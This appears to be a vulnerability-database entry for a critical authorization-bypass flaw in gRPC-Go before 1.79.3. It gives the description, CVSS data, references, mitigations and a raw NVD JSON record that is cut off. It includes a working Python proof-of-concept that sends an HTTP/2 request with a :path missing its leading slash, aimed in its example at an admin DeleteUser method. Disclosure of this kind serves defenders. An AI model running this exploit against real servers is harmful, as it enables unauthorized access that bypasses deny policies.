CVE-2026-33186

Description

gRPC-Go is the Go language implementation of gRPC. Versions prior to 1.79.3 have an authorization bypass resulting from improper input validation of the HTTP/2 `:path` pseudo-header. The gRPC-Go server was too lenient in its routing logic, accepting requests where the `:path` omitted the mandatory leading slash (e.g., `Service/Method` instead of `/Service/Method`). While the server successfully routed these requests to the correct handler, authorization interceptors (including the official `grpc/authz` package) evaluated the raw, non-canonical path string. Consequently, "deny" rules defined using canonical paths (starting with `/`) failed to match the incoming request, allowing it to bypass the policy if a fallback "allow" rule was present. This affects gRPC-Go servers that use path-based authorization interceptors, such as the official RBAC implementation in `google.golang.org/grpc/authz` or custom interceptors relying on `info.FullMethod` or `grpc.Method(ctx)`; AND that have a security policy contains specific "deny" rules for canonical paths but allows other requests by default (a fallback "allow" rule). The vulnerability is exploitable by an attacker who can send raw HTTP/2 frames with malformed `:path` headers directly to the gRPC server. The fix in version 1.79.3 ensures that any request with a `:path` that does not start with a leading slash is immediately rejected with a `codes.Unimplemented` error, preventing it from reaching authorization interceptors or handlers with a non-canonical path string. While upgrading is the most secure and recommended path, users can mitigate the vulnerability using one of the following methods: Use a validating interceptor (recommended mitigation); infrastructure-level normalization; and/or policy hardening.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:grpc:grpc:*:*:*:*:*:go:*:* - VULNERABLE

gRPC-Go < 1.79.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import h2.connection
import h2.events
import socket

def send_malformed_grpc(host, port, service, method):
    """
    PoC to demonstrate authorization bypass via malformed :path header.
    Sends a request without the leading slash to bypass deny rules.
    """
    sock = socket.create_connection((host, port))
    h2_conn = h2.connection.H2Connection()
    h2_conn.initiate_connection()
    sock.sendall(h2_conn.data_to_send())

    # Malformed path: 'Service/Method' instead of '/Service/Method'
    path = f"{service}/{method}"
    headers = [
        (':method', 'POST'),
        (':path', path),
        (':scheme', 'http'),
        (':authority', host),
        ('content-type', 'application/grpc'),
        ('te', 'trailers'),
    ]

    h2_conn.send_headers(1, headers, end_stream=True)
    sock.sendall(h2_conn.data_to_send())

    print(f"[+] Sent request with malformed path: {path}")
    print("[+] Check if the request was processed despite authorization policies.")

    sock.close()

# Usage Example
# send_malformed_grpc("target.com", 443, "AdminService", "DeleteUser")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33186
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33186
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33186/
[4] VulDB https://vuldb.com/cve/CVE-2026-33186
[5] https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33186", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:45.180", "lastModified": "2026-04-10T20:49:17.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "gRPC-Go is the Go language implementation of gRPC. Versions prior to 1.79.3 have an authorization bypass resulting from improper input validation of the HTTP/2 `:path` pseudo-header. The gRPC-Go server was too lenient in its routing logic, accepting requests where the `:path` omitted the mandatory leading slash (e.g., `Service/Method` instead of `/Service/Method`). While the server successfully routed these requests to the correct handler, authorization interceptors (including the official `grpc/authz` package) evaluated the raw, non-canonical path string. Consequently, \"deny\" rules defined using canonical paths (starting with `/`) failed to match the incoming request, allowing it to bypass the policy if a fallback \"allow\" rule was present. This affects gRPC-Go servers that use path-based authorization interceptors, such as the official RBAC implementation in `google.golang.org/grpc/authz` or custom interceptors relying on `info.FullMethod` or `grpc.Method(ctx)`; AND that have a security policy contains specific \"deny\" rules for canonical paths but allows other requests by default (a fallback \"allow\" rule). The vulnerability is exploitable by an attacker who can send raw HTTP/2 frames with malformed `:path` headers directly to the gRPC server. The fix in version 1.79.3 ensures that any request with a `:path` that does not start with a leading slash is immediately rejected with a `codes.Unimplemented` error, preventing it from reaching authorization interceptors or handlers with a non-canonical path string. While upgrading is the most secure and recommended path, users can mitigate the vulnerability using one of the following methods: Use a validating interceptor (recommended mitigation); infrastructure-level normalization; and/or policy hardening."}, {"lang": "es", "value": "gRPC-Go es la implementación en lenguaje Go de gRPC. Las versiones anteriores a la 1.79.3 tienen un bypass de autorización resultante de una validación de entrada incorrecta del pseudo-encabezado HTTP/2 ':path'. El servidor gRPC-Go era demasiado indulgente en su lógica de enrutamiento, aceptando solicitudes donde el ':path' omitía la barra inicial obligatoria (por ejemplo, 'Service/Method' en lugar de '/Service/Method'). Si bien el servidor enrutó con éxito estas solicitudes al gestor correcto, los interceptores de autorización (incluido el paquete oficial 'grpc/authz') evaluaron la cadena de ruta cruda y no canónica. En consecuencia, las reglas de 'denegación' definidas usando rutas canónicas (que comienzan con '/') no lograron coincidir con la solicitud entrante, permitiendo que bypassara la política si una regla de 'permiso' de respaldo estaba presente. Esto afecta a los servidores gRPC-Go que utilizan interceptores de autorización basados en rutas, como la implementación oficial de RBAC en 'google.golang.org/grpc/authz' o interceptores personalizados que dependen de 'info.FullMethod' o 'grpc.Method(ctx)'; Y que tienen una política de seguridad que contiene reglas de 'denegación' específicas para rutas canónicas pero permite otras solicitudes por defecto (una regla de 'permiso' de respaldo). La vulnerabilidad es explotable por un atacante que puede enviar tramas HTTP/2 crudas con encabezados ':path' malformados directamente al servidor gRPC. La corrección en la versión 1.79.3 asegura que cualquier solicitud con un ':path' que no comience con una barra inicial sea inmediatamente rechazada con un error 'codes.Unimplemented', impidiendo que llegue a los interceptores de autorización o gestores con una cadena de ruta no canónica. Si bien la actualización es la ruta más segura y recomendada, los usuarios pueden mitigar la vulnerabilidad utilizando uno de los siguientes métodos: Usar un interceptor de validación (mitigación recomendada); normalización a nivel de infraestructura; y/o endurecimiento de políticas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:grpc:grpc:*:*:*:*:*:go:*:*", "versionEndExcluding": "1.79.3", "matchCriteriaId": "D5AB3ED0-D11B-461E-B2B1-627D5CCEA2 ... (truncated)